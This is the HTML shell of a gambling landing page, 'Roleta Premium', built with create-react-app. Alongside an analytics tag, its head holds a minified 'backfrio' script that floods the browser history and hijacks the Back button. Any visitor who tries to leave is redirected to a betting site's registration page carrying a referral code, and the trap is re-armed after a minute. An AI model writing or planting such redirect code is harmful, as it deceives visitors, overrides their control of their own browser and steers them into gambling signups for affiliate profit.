<!doctype html>
<html lang="en">
<meta http-equiv="content-type" content="text/html;charset=utf-8" />

<head>
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-ELXYT6N9JP"></script>
    <script>
        function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","G-ELXYT6N9JP")
    </script>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width,initial-scale=1" />
    <meta name="theme-color" content="#000000" />
    <meta name="description" content="Web site created using create-react-app" />
    <link rel="apple-touch-icon" href="logo192.png" />
    <script>
        function backfrio(){history.pushState({},"",location.href),history.pushState({},"",location.href),window.onpopstate=function(){setTimeout((function(){location.href="https://clubpix.bet/register?code=YITF8KIYU8"}),1)}}setTimeout("backfrio()",6e4),backfrio()
    </script>
    <title>Roleta Premium</title>
    <script defer="defer" src="static/js/main.0d01978b.js"></script>
</head>

<body>
    <noscript></noscript>
    <div id="root"></div>
    <script>
        var offer="https://clubpix.bet/register?code=YITF8KIYU8"
    </script>
</body>

</html>